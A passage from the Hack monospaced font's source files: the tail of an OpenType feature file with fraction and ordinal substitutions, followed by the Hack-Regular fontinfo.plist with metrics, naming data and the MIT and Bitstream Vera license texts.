MOL ; # Moldavian language ROM ; # Romanian } frac; feature ordn { # Ordinals # DEFAULT sub @aalt1 [A a]' by [ordfeminine ordfeminine]; sub @aalt1 [O o]' by [ordmasculine ordmasculine]; script latn; # Latin sub @aalt1 [A a]' by [ordfeminine ordfeminine]; sub @aalt1 [O o]' by [ordmasculine ordmasculine]; language MOL ; # Moldavian language ROM ; # Romanian } ordn; #feature case { # # Case-Sensitive Forms # # DEFAULT # sub @case1 by @case2; # script latn; # Latin # sub @case1 by @case2; # language MOL ; # Moldavian # language ROM ; # Romanian #} case;
Hack/source/Hack-Regular.ufo/fontinfo.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>ascender</key> <integer>1556</integer> <key>capHeight</key> <integer>1493</integer> <key>copyright</key> <string>Copyright (c) 2018 Source Foundry Authors / Copyright (c) 2003 by Bitstream, Inc. All Rights Reserved.</string> <key>descender</key> <integer>-492</integer> <key>familyName</key> <string>Hack</string> <key>macintoshFONDFamilyID</key> <integer>128</integer> <key>macintoshFONDName</key> <string>Hack</string> <key>note</key> <string></string> <key>openTypeHeadCreated</key> <string>2017/10/23 12:00:00</string> <key>openTypeHeadFlags</key> <array> </array> <key>openTypeHheaAscender</key> <integer>1901</integer> <key>openTypeHheaDescender</key> <integer>-483</integer> <key>openTypeHheaLineGap</key> <integer>0</integer> <key>openTypeNameCompatibleFullName</key> <string>Hack Regular</string> <key>openTypeNameDescription</key> <string></string> <key>openTypeNameDesigner</key> <string>Source Foundry Authors</string> <key>openTypeNameDesignerURL</key> <string>https://github.com/source-foundry/Hack</string> <key>openTypeNameLicense</key> <string>The work in the Hack project is Copyright 2018 Source Foundry Authors and licensed under the MIT License The work in the DejaVu project was committed to the public domain. Bitstream Vera Sans Mono Copyright 2003 Bitstream Inc. and licensed under the Bitstream Vera License with Reserved Font Names "Bitstream" and "Vera" MIT License Copyright (c) 2018 Source Foundry Authors Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. BITSTREAM VERA LICENSE Copyright (c) 2003 by Bitstream, Inc. All Rights Reserved. Bitstream Vera is a trademark of Bitstream, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of the fonts accompanying this license ("Fonts") and associated documentation files (the "Font Software"), to reproduce and distribute the Font Software, including without limitation the rights to use, copy, merge, publish, distribute, and/or sell copies of the Font Software, and to permit persons to whom the Font Software is furnished to do so, subject to the following conditions: The above copyright and trademark notices and this permission notice shall be included in all copies of one or more of the Font Software typefaces. The Font Software may be modified, altered, or added to, and in particular the designs of glyphs or characters in the Fonts may be modified and additional glyphs or characters may be added to the Fonts, only if the fonts are renamed to names not containing either the words "Bitstream" or the word "Vera". This License becomes null and void to the extent applicable to Fonts or Font Software that has been modified and is distributed under the "Bitstream Vera" names. The Font Software may be sold as part of a larger software package but no copy of one or more of the Font Software typefaces may be sold by itself. THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL BITSTREAM OR THE GNOME FOUNDATION BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM OTHER DEALINGS IN THE FONT SOFTWARE. Except as contained in this notice, the names of Gnome, the Gnome Foundation, and Bitstream Inc., shall not be used in advertising or otherwise to promote the sale, use or other dealings in this Font Software without prior written authorization from the Gnome Foundation or Bitstream Inc., respectively. For further information, contact: fonts at gnome dot org.</string> <key>openTypeNameLicenseURL</key> <string>https://github.com/source-foundry/Hack/blob/master/LICENSE.md</string> <key>openTypeNameManufacturer</key> <string>Source Foundry</string> <key>openTypeNameManufacturerURL</key> <string>https://github.com/source-foundry</string> <key>openTypeNamePreferredFamilyName</key> <string>Hack</string> <key>openTypeNamePreferredSubfamilyName</key> <string>Regular</string> <key>openTypeNameSampleText</key> <string></string> <key>openTypeNameUniqueID</key> <string>SourceFoundry: Hack: 2018</string> <key>openTypeNameVersion</key> <string>Version 3.003</string> <key>openTypeOS2CodePageRanges</key> <array> <integer>0</integer> <integer>1</integer> <integer>2</integer> <integer>3</integer> <integer>4</integer> <integer>7</integer> <integer>8</integer> <integer>29</integer> <integer>48</integer> <integer>49</integer> <integer>50</integer> <integer>52</integer> <integer>54</integer> <integer>55</integer> <integer>56</integer> <integer>57</integer> <integer>58</integer> <integer>59</integer> <integer>60</integer> <integer>62</integer> <integer>63</integer> </array> <key>openTypeOS2FamilyClass</key> <array> <integer>0</integer> <integer>0</integer> </array> <key>openTypeOS2Panose</key> <array> <integer>2</integer> <integer>11</integer> <integer>6</integer> <integer>9</integer> <integer>3</integer> <integer>2</integer> <integer>2</integer> <integer>2</integer> <integer>2</integer> <integer>4</integer> </array> <key>openTypeOS2Selection</key> <array> </array> <key>openTypeOS2StrikeoutPosition</key> <integer>530</integer> <key>openTypeOS2StrikeoutSize</key> <integer>102</integer> <key>openTypeOS2SubscriptXOffset</key> <integer>0</integer> <key>openTypeOS2SubscriptXSize</key> <integer>1331</integer> <key>openTypeOS2SubscriptYOffset</key> <integer>153</integer> <key>openTypeOS2SubscriptYSize</key> <integer>1228</integer> <key>openTypeOS2SuperscriptXOffset</key> <integer>0</integer> <key>openTypeOS2SuperscriptXSize</key> <integer>1331</integer> <key>openTypeOS2SuperscriptYOffset</key> <integer>716</integer> <key>openTypeOS2SuperscriptYSize</key> <integer>1228</integer> <key>openTypeOS2Type</key> <array> <integer>0</integer> </array> <key>openTypeOS2TypoAscender</key> <integer>1556</integer> <key>openTypeOS2TypoDescender</key> <integer>-492</integer> <key>openTypeOS2TypoLineGap</key> <integer>410</integer> <key>openTypeOS2UnicodeRanges</key> <array> <integer>0</integer> <integer>1</integer> <integer>2</integer> <integer>3</integer> <integer>5</integer> <integer>6</integer> <integer>7</integer> <integer>9</integer> <integer>10</integer> <integer>24</integer> <integer>26</integer> <integer>29</integer> <integer>31</integer> <integer>32</integer> <integer>33</integer> <integer>35</integer> <integer>36</integer> <integer>37</integer> <integer>38</integer> <integer>39</integer> <integer>43</integer> <integer>44</integer> <integer>45</integer> <integer>47</integer> <integer>60</integer> <integer>69</integer> </array> <key>openTypeOS2VendorID</key> <string>SRC</string> <key>openTypeOS2WeightClass</key> <integer>400</integer> <key>openTypeOS2WidthClass</key> <integer>5</integer> <key>openTypeOS2WinAscent</key> <integer>1901</integer> <key>openTypeOS2WinDescent</key> <integer>483</integer> <key>postscriptBlueFuzz</key> <integer>0</integer> <key>postscriptBlueScale</key> <real>0.036999999999999998</real> <key>postscriptBlueShift</key> <integer>14</integer> <key>postscriptBlueValues</key> <array> <integer>-29</integer> <integer>0</integer> <integer>1120</integer> <integer>1147</integer> <integer>1493</integer> <integer>1520</integer> </array> <key>postscriptFontName</key> <string>Hack-Regular</string> <key>postscriptForceBold</key> <false/> <key>postscriptFullName</key> <string>Hack Regular</string> <key>postscriptIsFixedPitch</key> <true/> <key>postscriptOtherBlues</key> <array> <integer>-440</integer> <integer>-430</integer> </array> <key>postscriptStemSnapH</key> <array> <integer>170</integer> <integer>143</integer> <integer>156</integer> </array> <key>postscriptStemSnapV</key> <array> <integer>203</integer> <integer>160</integer> <integer>184</integer> </array> <key>postscriptUnderlinePosition</key> <integer>-220</integer> <key>postscriptUnderlineThickness</key> <integer>90</integer> <key>postscriptUniqueID</key> <integer>-1</integer> <key>styleMapFamilyName</key> <string>Hack</string> <key>styleMapStyleName</key> <string>regular</string> <key>styleName</key> <string>Regular</string> <key>trademark</key> <string></string> <key>unitsPerEm</key> <integer>2048</integer> <key>versionMajor</key> <integer>3</integer> <key>versionMinor</key> <integer>003</integer> <key>xHeight</key> <integer>1120</integer> </dict> </plist>